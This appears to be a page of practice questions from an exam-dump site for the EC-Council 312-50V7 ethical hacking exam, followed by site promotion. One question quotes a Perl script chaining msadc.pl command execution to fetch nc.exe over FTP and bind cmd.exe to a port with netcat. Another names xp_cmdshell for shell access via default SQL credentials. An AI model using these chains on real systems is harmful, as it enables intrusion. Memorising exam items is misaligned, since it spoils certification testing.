Firewalk has just completed the second phase (the scanning phase) and a technician receives the output shown below. What conclusions can be drawn based on these scan results? TCP port 21 no response TCP port 22 no response TCP port 23 Time-to-live exceeded
A. The firewall itself is blocking ports 21 through 23 and a service is listening on port 23 of the target host.
B. The lack of response from ports 21 and 22 indicate that those services are not running on the destination server.
C. The scan on port 23 passed through the filtering device. This indicates that port 23 was not blocked at the firewall.
D. The scan on port 23 was able to make a connection to the destination host prompting the firewall to respond with a TTL error.
When setting up a wireless network, an administrator enters a pre-shared key for security. Which of the following is true?
A. The key entered is a symmetric key used to encrypt the wireless data.
B. The key entered is a hash that is used to prove the integrity of the wireless data.
C. The key entered is based on the Diffie-Hellman method.
D. The key is an RSA key used to encrypt the wireless data.
Which of the following defines the role of a root Certificate Authority (CA) in a Public Key Infrastructure (PKI)?
A. The root CA is the recovery agent used to encrypt data when a user's certificate is lost.
B. The root CA stores the user's hash value for safekeeping.
C. The CA is the trusted root that issues certificates.
D. The root CA is used to encrypt email messages to prevent unintended disclosure of data.
An NMAP scan of a server shows port 69 is open. What risk could this pose?
A. Unauthenticated access
B. Weak SSL version
C. Cleartext login
D. Web portal data leak
A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester come across a perl script that runs the following msadc functions:system("perl msadc.pl -h $host -C \"echo open $your >testfile\""); system("perl msadc.pl -h $host -C \"echo $user>>testfile\""); system("perl msadc.pl -h $host -C \"echo $pass>>testfile\""); system ("perl msadc.pl -h $host -C \"echo bin>>testfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>testfile\""); system("perl msadc.pl -h $host -C \"echo get hacked.html>>testfile\""); ("perl msadc.pl -h $host -C \"echo quit>>testfile\""); system("perl msadc.pl -h $host -C \"ftp \-s\:testfile\""); $o=; print "Opening ...\n"; system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
Which exploit is indicated by this script?
A. A buffer overflow exploit
B. A chained exploit
C. A SQL injection exploit
D. A denial of service exploit
Which security strategy requires using several, varying methods to protect IT systems against attacks?
A. Defense in depth
B. Three-way handshake
C. Covert channels
D. Exponential backoff algorithm
An IT security engineer notices that the company's web server is currently being hacked. What should the engineer do next?
A. Unplug the network connection on the company's web server.
B. Determine the origin of the attack and launch a counterattack.
C. Record as much information as possible from the attack.
D. Perform a system restart on the company's web server.
During a penetration test, a tester finds a target that is running MS SQL 2000 with default credentials. The tester assumes that the service is running with Local System account. How can this weakness be exploited to access the system?
A. Using the Metasploit psexec module setting the SA / Admin credential
B. Invoking the stored procedure xp_shell to spawn a Windows command shell
C. Invoking the stored procedure cmd_shell to spawn a Windows command shell
D. Invoking the stored procedure xp_cmdshell to spawn a Windows command shell
Which of the following programming languages is most vulnerable to buffer overflow attacks?
A. Perl
B. C++
C. Python
D. Java
Which property ensures that a hash function will not produce the same hashed value for two different messages?
A. Collision resistance
B. Bit length
C. Key strength
D. Entropy
Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only EC-COUNCIL exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your 312-50V7 exam preparations and EC-COUNCIL certification application, do not hesitate to visit our Vcedump.com to find your solutions here.